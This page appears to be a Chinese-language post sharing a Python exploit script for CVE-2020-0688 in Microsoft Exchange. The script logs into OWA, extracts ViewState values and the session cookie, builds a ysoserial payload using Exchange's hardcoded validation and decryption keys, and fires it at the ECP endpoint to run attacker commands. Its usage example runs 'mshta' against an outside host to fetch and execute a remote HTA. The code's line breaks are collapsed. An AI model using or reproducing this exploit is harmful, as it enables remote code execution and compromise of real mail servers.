CVE-2020-0688-微软Exchange服务器静态密钥缺陷导致远程代码EXP

# encoding: UTF-8import requestsimport readlineimport argparseimport reimport sysimport osimport urllib3from urllib.parse import urlparsefrom urllib.parse import quoteurllib3.disable_warnings()
ysoserial_path = os.path.abspath(os.path.dirname(__file__))+"/ysoserial-1.32/"session = requests.Session()
def get_value(url, user, pwd):    print("[*] Tring to login owa...")    tmp = urlparse(url)    base_url = "{}://{}".format(tmp.scheme, tmp.netloc)    paramsPost = {"password": ""+pwd+"", "isUtf8": "1", "passwordText": "", "trusted": "4",                "destination": ""+url+"", "flags": "4", "forcedownlevel": "0", "username": ""+user+""}    headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Upgrade-Insecure-Requests": "1",            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0", "Connection": "close", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Cookie": "PrivateComputer=true; PBack=0"}    cookies = {"PBack": "0", "PrivateComputer": "true"}    login_url = base_url + '/owa/auth.owa'    print("[+] Login url: {}".format(login_url))    try:        login = session.post(login_url, data=paramsPost,                          headers=headers, verify=False, timeout=30)        print("[*] Status code: %i" % login.status_code)        if "reason=" in login.text or "reason=" in login.url and "owaLoading" in login.text:            print("[!] Login Incorrect, please try again with a different account..")            # sys.exit(1)        #print(str(response.text))    except Exception as e:        print("[!] login error , error: {}".format(e))        sys.exit(1)    print("[+] Login successfully! ")    try:        print("[*] Tring to get __VIEWSTATEGENERATOR...")        target_url = "{}/ecp/default.aspx".format(base_url)        new_response = session.get(target_url, verify=False, timeout=15)        view = re.compile(            'id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(new_response.text))[0]        print("[+] Done! __VIEWSTATEGENERATOR:{}".format(view))    except:        view = "B97B4E27"        print("[*] Can't get __VIEWSTATEGENERATOR, use default value: {}".format(view))    try:        print("[*] Tring to get ASP.NET_SessionId....")        key = session.cookies['ASP.NET_SessionId']        print("[+] Done!  ASP.NET_SessionId: {}".format(key))    except Exception as e:        key = None        print("[!] Get ASP.NET_SessionId error, error: {} n[*] Exit..".format(e))     return view, key, base_url
def ysoserial(cmd):    cmd = ysoserial_path+cmd    r = os.popen(cmd)    res = r.readlines()    return res[-1]
def main():    parser = argparse.ArgumentParser()    parser.add_argument("-s", "--server", required=True, help="ECP Server URL Example: http://ip/owa")    parser.add_argument("-u", "--user", required=True, help="login account Example: domain\user")    parser.add_argument("-p", "--password", required=True, help="Password")    parser.add_argument("-c", "--cmd", help="Command u want to execute", required=True)    parser.add_argument("-e", "--encrypt", help="Encrypt the payload", action='store_true',default=False)    args = parser.parse_args()    url = args.server    print("[*] Start to exploit..")    user = args.user    pwd = args.password    command = args.cmd    view, key, base_url = get_value(url, user, pwd)    if key is None:        key = 'test'        sys.exit(1)    ex_payload = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{}" --viewstateuserkey="{}" --islegacy """.format(command,view,key)    if args.encrypt:        re_payload = ex_payload + ' --decryptionalg="3DES" --decryptionkey="E9D2490BD0075B51D1BA5288514514AF" --isencrypted'    else:        re_payload = ex_payload + " --isdebug"    print("n"+re_payload)    out_payload = ysoserial(re_payload)    if args.encrypt:        final_exp = "{}/ecp/default.aspx?__VIEWSTATEENCRYPTED=&__VIEWSTATE={}".format(base_url, quote(out_payload))    else:        final_exp = "{}/ecp/default.aspx?__VIEWSTATEGENERATOR={}&__VIEWSTATE={}".format(base_url, view, quote(out_payload))    print("n[+] Exp url: {}".format(final_exp))    print("n[*] Auto trigger payload..")    status = session.get(final_exp,verify=False,timeout=15)    if status.status_code==500:        print("[*] Status code: %i, Maybe success!" % status.status_code)
if __name__ == "__main__":    main()

python3 CVE-2020-0688_EXP.py -h
usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e]
optional arguments:    -h, --help            show this help message and exit    -s SERVER, --server ECP Server URL Example: http://ip/owa    -u USER, --user USER  login account Example: domainuser    -p PASSWORD, --password PASSWORD    -c CMD, --cmd CMD     Command u want to execute    -e, --encrypt         Encrypt the payload    例  python CVE-2020-0688_EXP.py -s https://mail.x.com/ -u [email protected] -p passwd -c "mshta http://1.1.1.1/test.hta"